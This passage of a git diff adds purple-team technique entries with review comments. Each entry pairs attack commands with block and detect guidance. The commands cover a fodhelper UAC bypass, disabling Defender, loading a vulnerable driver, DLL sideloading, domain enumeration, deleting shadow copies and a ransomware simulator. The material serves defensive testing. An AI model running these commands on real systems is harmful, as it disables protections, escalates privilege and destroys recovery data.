@@ -0,0 +1,20 @@ +name: Sideload a DLL into a legitimate application +description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application. +platforms: +- windows +guidance: +- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder) +controls: +- Endpoint Protection +- SIEM +metadata: + id: 2496e250-5757-482f-9661-daea872395ae + tid: T1574.002 + tactic: TA0005 + x_vectr_id: 2496e250-5757-482f-9661-daea872395ae + isv: 1 diff --git a/fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml new file mode 100644 index 0000000..bc14660 --- /dev/null +++ b/fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml 
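Review bot: The image-load detection is framed only around an unexpected path, but in the scenario this guidance sets up (`copy {{ application }} .` then `move {{ dll }} {{ expected_dll }}`) the DLL sits beside a legitimate application in a directory the attacker chose, so a "System32 DLL loaded from temp" rule does not describe it. The stronger signal in the same image-load telemetry (Sysmon Event ID 7 carries Signed/Signature fields) is the signer mismatch: a signed application loading an unsigned DLL, or one signed by a different publisher, from its own directory. Add a detect line such as `- Using image load telemetry (e.g. Sysmon Event ID 7), alert when a signed application loads an unsigned DLL, or a DLL from a different signer, from the application's own directory`. The description could also state that the copy step exists because the application directory is searched first, which is what makes the sideload work and what distinguishes T1574.002 from search-order hijacking.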
@@ -0,0 +1,22 @@ +name: Load known-abusable kernel driver +description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes. +platforms: +- windows +guidance: +- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n" +block: +- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics. +- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules +- https://www.loldrivers.io/ +- Anomalous driver load blocked by endpoint security tool +detect: +- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6 +controls: +- Hardening +- Endpoint Protection +metadata: + id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0 + tid: T1014 + tactic: TA0005 + x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0 + isv: 1 diff --git a/fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml new file mode 100644 index 0000000..77a3868 --- /dev/null +++ b/fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml 
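Review bot: The guidance installs the driver through the Service Control Manager (`sc.exe create {{ name }} type= kernel ...`), which produces Event ID 7045 in the System log and, with Security System Extension auditing, 4697 in the Security log, both with a kernel-driver service type; these exist on every host without Sysmon and should sit beside the Sysmon ID 6 line. Add `- Kernel driver service installation detected via Event ID 7045/4697 (service type kernel driver) where the image hash or signer matches a known-vulnerable driver list such as loldrivers.io`. The HVCI/WDAC block lines only apply when the Microsoft vulnerable driver blocklist is actually enforced (HVCI enabled, or the recommended block policy deployed), so the test should record that precondition alongside the result. The `tid: T1014` (Rootkit) mapping is debatable for bring-your-own-vulnerable-driver; ATT&CK generally places it under T1068 and T1562.001, which is worth a second look before the index is published.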
@@ -0,0 +1,25 @@ +name: Bypass User Account Control (UAC) via fodhelper +description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification +platforms: +- windows +guidance: +- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f +- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f +- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f +- cmd> c:\windows\system32\fodhelper.exe +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs) +controls: +- SIEM +- Endpoint Protection +metadata: + id: 8c06191e-8c03-4b97-8c18-e28cde39fda5 + tid: T1548.002 + tactic: TA0004 + x_references: + - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/ + x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5 + isv: 1 diff --git a/fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml new file mode 100644 index 0000000..9574d4f --- /dev/null +++ b/fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml 
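Review bot: The registry detect line can be made concrete instead of generic: the bypass requires creating `HKCU\Software\Classes\ms-settings\Shell\Open\command` with a `DelegateExecute` value, so a rule on Sysmon Event ID 12/13 (or 4657 with a SACL) for that key path, followed by `fodhelper.exe` spawning a child process, is high-fidelity with essentially no benign hits. Add `- Creation of HKCU\Software\Classes\ms-settings\Shell\Open\command (DelegateExecute) followed by fodhelper.exe spawning a child process`. The guidance also leaves the hijack key in place after the test; add a cleanup step `cmd> reg delete HKCU\Software\Classes\ms-settings /f` so the host is not left in a state where any later fodhelper launch runs the planted command. `tactic: TA0004` here differs from the TA0005 used by the sibling DefenseEvasion entries; both are valid for T1548.002, but the index should choose one deliberately.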
@@ -0,0 +1,20 @@ +name: DLL execution using Rundll32 +description: Execute a malicious DLL's function directly using rundll32 +platforms: +- windows +guidance: +- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}] +block: +- Suspicious process execution/behavior blocked by endpoint security tool +- Payload on disk deleted/quarantined by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +controls: +- Endpoint Protection +- SIEM +metadata: + id: 940be4b6-6081-4808-ab64-aceadfeb3792 + tid: T1218.011 + tactic: TA0005 + x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792 + isv: 1 diff --git a/fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml new file mode 100644 index 0000000..66ceb94 --- /dev/null +++ b/fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml @@ -0,0 +1,20 @@ +name: Disable Windows Defender via PowerShell +description: Use PowerShell's Set-MpPreference to disable Windows Defender +platforms: +- windows +guidance: +- PS> Set-MpPreference -DisableBehaviorMonitoring $true +- PS> Set-MpPreference -DisableRealtimeMonitoring $true +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)" +controls: +- Endpoint Protection +metadata: + id: cb3ea139-979c-438a-9cf7-611b985f4d61 + tid: T1562.001 + tactic: TA0005 + x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61 + isv: 1 
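Review bot: The only detect line is the generic EDR one, but the useful discriminators are in the command line this guidance produces, `rundll32 {{ dll }},{{ export }}`: a DLL path in a user-writable or non-standard location, a module without a `.dll` extension, or an export name that is not a known entry point, all visible in 4688 (with command-line auditing on) or Sysmon Event ID 1. Add `- Process creation telemetry with command-line auditing (4688 / Sysmon 1) flags rundll32 loading a DLL from a user-writable path or calling an unusual export`, and note that without "Include command line in process creation events" 4688 carries no arguments at all.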
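Review bot: The Defender hunk lists only a generic EDR block, but Defender's own Tamper Protection is the control that makes `Set-MpPreference -DisableRealtimeMonitoring $true` and `-DisableBehaviorMonitoring $true` fail even for a local administrator; it should be a block line and the test should record whether it was on, since the outcome differs entirely. Add `- Tamper Protection enabled for Microsoft Defender Antivirus prevents local/administrative changes to real-time and behavior monitoring` with `Hardening` under controls. On the detect side the event mapping is roughly right (5001 real-time protection disabled, 5004/5007 configuration changed), but with Tamper Protection on the blocked attempt surfaces as a tampering alert rather than as 5001, so a "no 5001 seen" result should not be read as a failed test.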
diff --git a/fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml new file mode 100644 index 0000000..df9cb79 --- /dev/null +++ b/fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml @@ -0,0 +1,16 @@ +name: Modify identity policy in IdP +description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement. +platforms: +guidance: +block: +- '' +detect: +- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes +controls: +- SIEM +metadata: + id: cbd9070f-03fa-455f-af46-99e8d41146ac + tid: T1484 + tactic: TA0003 + x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac + isv: 1 diff --git a/fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml b/fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml new file mode 100644 index 0000000..dbf086a --- /dev/null +++ b/fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml 
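Review bot: `block` is empty, but policy edits in an IdP have a concrete preventive control: restricting the policy-admin role to a just-in-time (PIM-style) assignment that itself requires phishing-resistant MFA, so that the principal performing the change in the guidance scenario is strongly authenticated and the role is not standing. Add `- Policy modification is limited to a just-in-time privileged role that requires phishing-resistant MFA` with `IdP` under controls. "IdP control plane telemetry" is vague for a rule author; for the Entra ID example in the description the source is the Audit log activity `Update conditional access policy` (category Policy), and naming the log source per IdP makes the detect line buildable. `tactic: TA0003` (Persistence) for T1484 is defensible, but the file lives under DefenseEvasion, so the two should agree.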
@@ -0,0 +1,24 @@ +name: Internal network scan using Net Scan +description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect +platforms: +- windows +guidance: +- cmd> {{ netscan_binary }} +block: +- Network security controls block source generating a large volume of connection requests +- Block the installation and use of unapproved third-party utilities via application control software +detect: +- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs +controls: +- ID/PS +- Firewall +- SIEM +- Application Control +metadata: + id: 3f120c23-78c0-462f-808f-38ef4f607233 + tid: T1046 + tactic: TA0007 + x_tools: + - https://www.softperfect.com/products/networkscanner/ + x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233 + isv: 1 diff --git a/fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml b/fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml new file mode 100644 index 0000000..751b34b --- /dev/null +++ b/fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml 
@@ -0,0 +1,20 @@ +name: Domain trust discovery via nltest +description: Identify domain trust relationships using nltest.exe +platforms: +- windows +guidance: +- cmd> nltest.exe /domain_trusts /all_trusts +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. +controls: +- Endpoint Protection +- SIEM +metadata: + id: 4266c26e-0470-4b97-8dc3-1d24fe35f586 + tid: T1482 + tactic: TA0007 + x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586 + isv: 1 diff --git a/fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml new file mode 100644 index 0000000..b1e1235 --- /dev/null +++ b/fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml 
@@ -0,0 +1,22 @@ +name: BloodHound DC enumeration +description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller +platforms: +guidance: +- cmd> SharpHound.exe -c DcOnly +block: +- '' +detect: +- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools +- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663) +- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance +controls: +- SIEM +- Identity Threat Protection +metadata: + id: 672f8861-c914-4f58-b861-5107ce19f61c + tid: T1087.002 + tactic: TA0007 + x_tools: + - https://github.com/BloodHoundAD/SharpHound + x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c + isv: 1 diff --git a/fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml new file mode 100644 index 0000000..0502f98 --- /dev/null +++ b/fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml 
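Review bot: The first detect line (SMB, ARP, SAMR traffic to many hosts) does not apply to the guidance as written: `SharpHound.exe -c DcOnly` restricts collection to LDAP queries against the domain controller and never touches member hosts, so a network-volume rule will not fire for this variant. The second line cites Event ID 4656/4663, which are file/registry object-access events; directory-service SACL hits are logged as 4662 (as the DCSync entry in this same commit correctly uses), and plain LDAP reads are better seen via Directory Service field-engineering logging (Event ID 1644, expensive/inefficient searches) or an identity sensor on the DC. I would rewrite the second line as `- Enable Directory Service Access auditing with a SACL on high-value objects and alert on Event ID 4662 bursts from one source; for query-level visibility use Event ID 1644 or an ITDR sensor to flag broad LDAP searches (e.g. objectClass=* with many attributes)`. `platforms` should be `- windows` for SharpHound.exe, and the BLS URL contains `recoannaissance`, which looks like a typo that will 404 (the same line has `Evevnt`).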
@@ -0,0 +1,23 @@ +name: Enumerate domain groups and users using net +description: Enumerate domain users and domain groups using the builtin net.exe +platforms: +- windows +guidance: +- cmd> net user /domain +- cmd> net group /domain +- cmd> net group "Domain Admins" /domain +- cmd> net group "Domain Computers" /domain +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. +controls: +- Endpoint Protection +- SIEM +metadata: + id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2 + tid: T1087.002 + tactic: TA0007 + x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2 + isv: 1 diff --git a/fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml b/fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml new file mode 100644 index 0000000..1c91bac --- /dev/null +++ b/fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml @@ -0,0 +1,19 @@ +name: Retrieve system information +description: Retrieve information about the system using multiple builtin commands +platforms: +- windows +guidance: +- CMD> systeminfo ipconfig tasklist sc query wmic product get +block: +- '' +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +controls: +- Endpoint Protection +- SIEM +metadata: + id: 9064e91a-be78-48a5-9112-28d5701d6d51 + tid: T1082 + tactic: TA0007 + x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51 + isv: 1 
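Review bot: In the system-information hunk the guidance `CMD> systeminfo ipconfig tasklist sc query wmic product get` is five separate commands joined on one line; run literally it executes only `systeminfo` with unrecognized arguments and errors out, so it should become one list item per command (`- CMD> systeminfo`, `- CMD> ipconfig /all`, `- CMD> tasklist`, `- CMD> sc query`, `- CMD> wmic product get name,version`). Separately, `wmic product get` enumerates `Win32_Product`, which triggers a consistency check and possible repair of every MSI-installed package on the host; it is slow and can have side effects, so the entry should warn the operator or substitute the `Uninstall` registry keys. `wmic.exe` is also deprecated and absent on recent Windows 11 builds, which affects reproducibility of the test.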
diff --git a/fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml new file mode 100644 index 0000000..e73f4ce --- /dev/null +++ b/fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml @@ -0,0 +1,20 @@ +name: Domain Controller discovery via nltest +description: Use nltest.exe to identify domain controllers in the domain +platforms: +- windows +guidance: +- cmd> nltest.exe /dclist:{{ domain }} +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. +controls: +- Endpoint Protection +- SIEM +metadata: + id: bc85f11b-e481-4afb-a5f5-db26e5c07433 + tid: T1018 + tactic: TA0007 + x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433 + isv: 1 diff --git a/fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml new file mode 100644 index 0000000..867c552 --- /dev/null +++ b/fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml 
@@ -0,0 +1,22 @@ +name: Macro - Remote Template +description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document +platforms: +- windows +guidance: +block: +- Macro execution is blocked by GPO policy +- Suspicious process execution/behavior blocked by endpoint security tool +- Payload on disk deleted/quarantined by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Payload on disk triggers an alert with endpoint security tool +controls: +- Endpoint Protection +- Hardening +- SIEM +metadata: + id: a7134d71-dc49-41a8-a309-ec520c96a089 + tid: T1221 + tactic: TA0005 + x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089 + isv: 1 diff --git a/fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml new file mode 100644 index 0000000..77e983d --- /dev/null +++ b/fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml @@ -0,0 +1,19 @@ +name: Extract sensitive data over HTTP +description: Extract data from the network over HTTP tcp/80 to an external host or IP. +platforms: +guidance: +- http://dlptest.com/http-post/ +block: +- Sensitive data sent over the network is blocked by network DLP tool +detect: +- Sensitive data sent over the network is detected by network DLP tool +controls: +- Firewall +- DLP +- Web Gateway +metadata: + id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + tid: T1048.003 + tactic: TA0010 + x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + isv: 1 diff --git a/fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml new file mode 100644 index 0000000..b807191 --- /dev/null +++ b/fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml 
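Review bot: Neither block nor detect uses the defining feature of this technique, which is that the document fetches its template (and the macro) from a remote host when opened. The most specific signals are therefore network-side: an Office process (`WINWORD.EXE`/`EXCEL.EXE`) making an outbound HTTP(S) connection to an external or uncategorized host, visible in Sysmon Event ID 3 or proxy logs keyed on the Office user-agent, as a detect line, and proxy category/newly-registered-domain blocking plus Office's Mark-of-the-Web macro block (the default for internet-sourced files since 2022) as block lines. Add `- Office process initiating an outbound connection to an external host is detected via proxy logs or endpoint network telemetry` under detect. `guidance:` is empty; the entry should at least say where the template is hosted and that the reference lives in the document's `settings.xml.rels` relationship, since that is what an operator needs to reproduce it and what an analyst needs to triage it.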
@@ -0,0 +1,19 @@ +name: Extract data to cloud storage service +description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box +platforms: +guidance: +block: +- Sensitive data sent over the network is blocked by network DLP tool +- Network security tool detects connection to domain based on category from proxy or DNS +detect: +- Sensitive data sent over the network is detected by network DLP tool +controls: +- Firewall +- DLP +- Web Gateway +metadata: + id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + tid: T1567.002 + tactic: TA0010 + x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + isv: 1 diff --git a/fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml new file mode 100644 index 0000000..3c2f885 --- /dev/null +++ b/fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml @@ -0,0 +1,20 @@ +name: Extract sensitive data over HTTP C2 +description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP +platforms: +guidance: +- implant> download {{ file }} +block: +- Sensitive data sent over the network is blocked by network DLP tool +- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool +detect: +- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool +controls: +- Firewall +- DLP +- Web Gateway +metadata: + id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + tid: T1041 + tactic: TA0010 + x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + isv: 1 diff --git a/fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml new file mode 100644 index 0000000..2dbf5f4 --- /dev/null +++ b/fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml 
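Review bot: In the cloud-storage hunk the second block line reads `Network security tool detects connection to domain based on category ...`, which describes a detection, not a block; it should say `blocks connection to domain` here, with a matching `detects` line under detect, where only DLP is currently listed. Category-based proxy control also needs the caveat that sanctioned storage tenants (corporate OneDrive/Google Drive) are allowed, so the effective control is tenant restriction or a CASB policy rather than a blanket category block, and that is worth naming under controls. `guidance:` is empty, so the test is not reproducible as written; a one-line example (the MEGA CLI, or a browser upload of a marker file) would fix that.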
@@ -0,0 +1,20 @@ +name: Delete shadows with vssadmin.exe +description: Delete volume shadow copies on the host to inhibit file system recovery +platforms: +- windows +guidance: +- CMD> vssadmin.exe delete shadows /all /quiet +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Suspicious Volume Shadow Service use detected in the SIEM using telemetry +controls: +- Endpoint Protection +- SIEM +metadata: + id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + tid: T1490 + tactic: TA0040 + x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + isv: 1 diff --git a/fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml new file mode 100644 index 0000000..4e63384 --- /dev/null +++ b/fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml @@ -0,0 +1,16 @@ +name: Modify group policy object +description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems. +platforms: +guidance: +block: +- '' +detect: +- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes +controls: +- SIEM +metadata: + id: 45591791-541b-4a27-bda9-75e6d78a66f4 + tid: T1484.001 + tactic: TA0005 + x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4 + isv: 1 diff --git a/fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml new file mode 100644 index 0000000..f6c2e88 --- /dev/null +++ b/fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml 
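Review bot: In the GPO hunk, "Configure auditing on group policy objects" is not actionable as written; the concrete source is Directory Service Changes auditing with a SACL on the `groupPolicyContainer` objects under `CN=Policies,CN=System,<domain>`, which yields Event ID 5136 (attribute modified, typically `versionNumber` and the `gPC*ExtensionNames` attributes) and 5137/5141 for create/delete, plus file-write auditing on SYSVOL for the policy content itself. Replace the detect line with `- Enable Directory Service Changes auditing with a SACL on groupPolicyContainer objects, then alert on Event ID 5136/5137/5141 where the subject is not a GPO-management principal or the change falls outside a change window`. `block` is empty, but GPO delegation (edit rights limited to a small group, ACLs reviewed for drift) is the preventive control and belongs there. `tactic: TA0005` with the file under Impact and a description about persistence and ransomware deployment is inconsistent; pick one.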
@@ -0,0 +1,20 @@ +name: Encrypt a large amount of files +description: Encrypt a large amount of files on the endpoint to simulate ransomware +platforms: +guidance: +- cmd> coldcryptor.exe run {{ extension }} +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Detect common ransomware extensions using file system telemetry +controls: +- Endpoint Protection +metadata: + id: 72224b97-93d1-4087-8b82-6b4342bf2e09 + tid: T1486 + tactic: TA0040 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor + x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09 + isv: 1 diff --git a/fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml b/fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml new file mode 100644 index 0000000..b95efea --- /dev/null +++ b/fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml @@ -0,0 +1,16 @@ +name: Suspicious service use +description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service. +platforms: +guidance: +block: +- '' +detect: +- Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations +controls: +- SIEM +metadata: + id: 1f9d5363-ddf4-41c3-8bc3-f80595219206 + tid: T1078 + tactic: TA0001 + x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206 + isv: 1 diff --git a/fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml b/fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml new file mode 100644 index 0000000..c26118f --- /dev/null 
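Review bot: The guidance calls `coldcryptor.exe` but `x_tools` points at `.../coldencryptor`, so one of the two names is wrong and an operator cannot tell which binary to run; align them. The entry should also state the safety preconditions a ransomware simulation needs, since the description says "a large amount of files" with no scoping: run only against a seeded directory of disposable test files, and confirm the tool has a decrypt/restore mode before execution. For detection, extension matching is weak when the extension is an operator-chosen `{{ extension }}`; a rate-based rule (one process performing a burst of rename/write operations across many files, or touching decoy files) is the signal that generalizes, e.g. `- Alert on a single process renaming or overwriting many files across directories within a short window (file system telemetry / canary files)`. `platforms` is empty for a Windows `.exe`.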
+++ b/fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml @@ -0,0 +1,20 @@ +name: External employee portal spray +description: Perform a password spray against an external employee login portal using a list of potential users and a single password +platforms: +guidance: +- Burp -> intruder +block: +- Portal protected with secure MFA solution +- IdP blocks bulk automated requests +detect: +- Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs +- Web application logs are ingested into the SIEM and alerts triggered for suspicious activity (e.g. brute force attacks, large number of 400/500 status codes) +controls: +- IdP +- SIEM +metadata: + id: 44fd7250-e613-441f-9cb6-5b98c2d71338 + tid: T1110.003 + tactic: TA0006 + x_vectr_id: 44fd7250-e613-441f-9cb6-5b98c2d71338 + isv: 1 diff --git a/fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml b/fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml new file mode 100644 index 0000000..7e31368 --- /dev/null +++ b/fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml @@ -0,0 +1,17 @@ +name: Suspicious external employee login +description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt. +platforms: +guidance: +block: +- Suspicious logins originating from select geolocations are blocked +detect: +- Baseline login events for users using authentication logs then generate alerts 